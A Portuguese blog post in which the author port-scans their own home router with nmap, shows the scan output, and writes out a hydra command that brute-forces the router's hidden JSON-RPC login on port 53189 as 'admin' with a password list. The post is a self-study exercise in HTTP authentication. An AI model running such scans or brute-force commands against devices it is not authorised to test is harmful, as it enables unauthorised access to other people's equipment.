Neste domingo eu estava aproveitando para estudar um poucos sobre protocolo HTTP e autenticação web. Eu estava analisando as portas que estavam escutando no meu gateway wifi. Após alguma pesquisa no google, encontrei o manual do produto e algumas informações importantes. Percebi que além do IP 192.168.0.1 o roteador também tinha uma interface adicional 192.168.100.1. Quais portas estão este roteador está escutando? Temos o nmap pra isso:
# nmap -sS -p1-65535 -r 192.168.0.1 Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-25 19:50 EDT Nmap scan report for 192.168.0.1 Host is up (0.046s latency). Not shown: 65528 closed ports PORT STATE SERVICE 22/tcp filtered ssh 80/tcp open http 1990/tcp open stun-p1 4700/tcp open netxms-agent 5431/tcp open park-agent 5523/tcp filtered unknown 8848/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 31.66 seconds # nmap -sS -p1-65535 -r 192.168.100.1 Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-25 19:28 EDT Nmap scan report for 192.168.100.1 Host is up (0.015s latency). Not shown: 65530 closed ports PORT STATE SERVICE 80/tcp open http 8080/tcp open http-proxy 8083/tcp open us-srv 50827/tcp open unknown 53189/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 72.14 seconds
Opções do nmap:
- -sS: Syn Scan
- -p1-65535: Scan das portas 1 até 65535
- -r: Não randomizar as portas
Após testar todas as portas usando um navegador como o Firefox, percebi que a porta 53189 estava pedindo um conjunto de usuário e senha que não era o padrão. Em uma máquina Windows com o Fiddler instalado, eu fiz uma captura de tentativa de login e digitei qualquer senha para verificar qual seria o resultado da tentativa. Sem sucesso, claro:
Estou usando um Kali com hydra e o comando abaixo:
# hydra -v -V -l admin -P pass.txt 192.168.100.1 -s 53189 http-post-form
"/api:{\"method\"\:\"login\",\"params\"\:{\"id\"\:\"^USER^\",\"password\"\:\"^PASS^\"},
\"id\"\:1,\"jsonrpc\"\:\"2.0\"}:error"


Comments
Post a Comment